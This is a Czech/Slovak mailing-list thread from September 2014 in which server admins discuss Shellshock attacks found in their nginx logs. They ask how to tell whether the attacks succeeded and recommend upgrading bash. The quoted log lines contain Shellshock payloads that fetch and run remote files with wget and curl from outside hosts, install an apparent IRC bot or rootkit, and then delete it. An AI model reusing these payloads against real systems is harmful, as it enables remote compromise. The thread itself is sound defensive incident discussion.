[vpsFree.cz: community-list] {Disarmed} Re: {Disarmed} {Disarmed} Re: Útoky na bash běží
Petr Vanek
petr at yarpen.cz
Mon Sep 29 10:38:41 CEST 2014
On 09/29/2014 10:33 AM, Jiří Medvěd wrote:
> Tak jsem to zkoumal a toto je celkem bezpecne, je to zda se pouze
> test, zda-li je ten bash zranitelnej, ale ve skutecnosti to nic nedela.
>
> 74.201.85.69/ec.z -> je pouze uvitaci stranka nginxu.
ted jo. Ale pred par dny to byl nejaky perlovsky irc bot.
>
> Upgraduj hlavne ten bash :)
>
> Medved
>
> Dne 29.9.2014 v 10:23 René Klačan napsal(a):
> > Ja mam v logoch nasledovne
>
> > root at yuna /home/rene # grep '() {' /var/log/nginx/*
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
> > fraud attempt from "74.201.85.69" claiming to be* *MailScanner
> > warning: numerical links are often malicious:*
> > 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
> > /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22wget -O /var/tmp/ec.z *MailScanner has detected a possible
> > fraud attempt from "74.201.85.69" claiming to be* *MailScanner
> > warning: numerical links are often malicious:*
> > 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
> > /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
> > /var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37
> > +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;};
> > /bin/bash -c \x22wget -O /var/tmp/ec.z *MailScanner has detected a
> > possible fraud attempt from "74.201.85.69" claiming to be*
> > *MailScanner warning: numerical links are often malicious:*
> > 74.201.85.69/ec.z;chmod <http://74.201.85.69/ec.z;chmod> +x
> > /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"
> > /var/log/nginx/access.log.1:209.126.230.72 - -
> > [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; };
> > ping -c 11 209.126.230.74" "shellshock-scan
> >
> (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
>
>
> /var/log/nginx/access.log.1:89.207.135.125 - - [25/Sep/2014:11:26:32
> > +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() {
> > :;}; /bin/ping -c 1 198.101.206.138"
> > /var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34
> > +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c
> > \x22echo testing9123123\x22; /bin/uname -a"
> > /var/log/nginx/access.log.1:137.189.52.234 - -
> > [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200
> > 193 "-" "() { :;}; /bin/bash -c \x22wget
> > http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh
> > http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf
> > /tmp/sh\x22"
>
> > vyzera to trochu zle :-/ ... co odporucate s tym robit? killnut
> > len podozrive procesy? a pohladat nejake stopy po tom, ci sa
> > nezapinaju po restarte?
>
>
> > 2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik at mimik.sk
> > <mailto:mimik at mimik.sk>>:
>
> > jedine si zistit ci mas dobru verziu bashu.
>
>
> > On 29 Sep 2014, at 10:08, Jan B. Kolář
> > <janbivoj.kolar at zazen-nudu.cz
> > <mailto:janbivoj.kolar at zazen-nudu.cz>> wrote:
>
> >> Ahoj,
> >>
> >> možná hloupá otázka - dá se nějak z logu zjistit, zda ten průnik
> > byl úspěšný či nikoliv?
> >>
> >> Honza
> >>
> >> On 29.9.2014 10 <tel:29.9.2014%2010>:02, Petr Krcmar wrote:
> >>> Dne 29.9.2014 v 09:57 Jiří Medvěd napsal(a):
> >>>> Hele,
> >>>>
> >>>> z jineho stroje:
> >>> Ano, to jsem našel taky. Zjevně se tam někdo snaží tlačit
> >>> rootkit:
> >>>
> >>> http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
>
> >>>
> >>
> >>
> >> _______________________________________________ Community-list
> >> mailing list Community-list at lists.vpsfree.cz
> > <mailto:Community-list at lists.vpsfree.cz>
> >> http://lists.vpsfree.cz/listinfo/community-list
>
>
> > _______________________________________________ Community-list
> > mailing list Community-list at lists.vpsfree.cz
> > <mailto:Community-list at lists.vpsfree.cz>
> > http://lists.vpsfree.cz/listinfo/community-list
>
>
>
>
> > _______________________________________________ Community-list
> > mailing list Community-list at lists.vpsfree.cz
> > http://lists.vpsfree.cz/listinfo/community-list
>
> _______________________________________________
> Community-list mailing list
> Community-list at lists.vpsfree.cz
> http://lists.vpsfree.cz/listinfo/community-list
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.vpsfree.cz/pipermail/community-list/attachments/20140929/1887ecf9/attachment-0002.html>
More information about the Community-list
mailing list